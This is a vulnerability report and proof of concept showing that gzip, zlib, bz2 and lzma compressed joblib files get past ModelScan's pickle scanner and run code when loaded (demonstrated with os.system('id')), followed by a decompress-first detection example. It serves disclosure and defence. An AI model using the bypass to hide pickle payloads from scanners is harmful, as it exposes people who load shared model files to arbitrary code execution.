ModelScan Scanner Bypass — Compressed Joblib PoC
Bug: Compressed .joblib files bypass ModelScan pickle safety scanner → ACE
Affected: modelscan==0.8.8 (latest) + joblib==1.5.3 (latest)
Reported: huntr.com — Model File Vulnerability Program
File
| File | Format | Size | ModelScan issues |
|---|---|---|---|
| evil_compressed.joblib | gzip-compressed pickle | 56B | 0 (bypass confirmed) |
Reproduce
```python
import pathlib, joblib
from modelscan.modelscan import ModelScan

path = pathlib.Path("evil_compressed.joblib")

# 1. Scan: should detect, actually returns 0 issues
result = ModelScan().scan(path)
print(result["summary"]["total_issues"])  # → 0 (BYPASS)

# 2. Load: payload fires
joblib.load(path)  # executes os.system("id")
# → uid=1000(user) gid=1000(user) groups=1000(user)
```
Root cause
`picklescanner.py` passes the raw compressed bytes straight to `pickletools.genops()`.
The first byte (`\x1f`, the gzip magic) is not a valid pickle opcode, so genops raises at byte 0
→ `globals_opt = None` → `ScanResults(issues=[])` → silent bypass.
All four compression formats joblib can write are affected: gzip, zlib, bz2, lzma.
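A defender-side check for the root cause above, written as an added example that is not part of the original report or of ModelScan's code: it names the four compression containers from their leading bytes, decompresses before calling `pickletools.genops()`, and lists the `module.name` references a pickle scanner would inspect. The sample pickle is a constructed, harmless reference to `collections.OrderedDict`; all function names are the example's own.

```python
import bz2, gzip, lzma, pickle, pickletools, zlib
from collections import OrderedDict

# The four containers joblib.dump(..., compress=...) can write.
COMPRESS = {"gzip": gzip.compress, "bz2": bz2.compress,
            "lzma": lzma.compress, "zlib": zlib.compress}
DECOMPRESS = {"gzip": gzip.decompress, "bz2": bz2.decompress,
              "lzma": lzma.decompress, "zlib": zlib.decompress}
MAGIC = ((b"\x1f\x8b", "gzip"), (b"BZh", "bz2"), (b"\xfd7zXZ\x00", "lzma"))

def detect_compression(data: bytes):
    """Name the container from its leading bytes, or None for a bare pickle."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    # zlib has no fixed magic: CMF byte 0x78 and a 2-byte header divisible by 31.
    if len(data) >= 2 and data[0] == 0x78 and ((data[0] << 8) | data[1]) % 31 == 0:
        return "zlib"
    return None

def naive_scan_fails(data: bytes) -> bool:
    """The page's root cause: genops() on raw compressed bytes raises, and a
    scanner that swallows that exception reports zero issues."""
    try:
        list(pickletools.genops(data))
        return False
    except Exception:
        return True

def scan_globals(data: bytes):
    """Decompress first, then collect 'module.name' references from GLOBAL and
    STACK_GLOBAL opcodes; still raises if the payload is not a pickle at all."""
    fmt = detect_compression(data)
    if fmt is not None:
        data = DECOMPRESS[fmt](data)
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            found.append(arg.replace(" ", ".", 1))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)  # heuristic: STACK_GLOBAL takes the last two strings
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append(f"{strings[-2]}.{strings[-1]}")
    return fmt, found

def demo():
    """Constructed sample: a harmless pickle that only references collections.OrderedDict."""
    raw = pickle.dumps(OrderedDict(), protocol=2)
    return {fmt: (naive_scan_fails(COMPRESS[fmt](raw)), scan_globals(COMPRESS[fmt](raw)))
            for fmt in COMPRESS}
```

`demo()` returns, per container, whether the naive scan raised and what the decompress-first scan recovered; every one of the four formats fails the naive path and yields `collections.OrderedDict` on the hardened path.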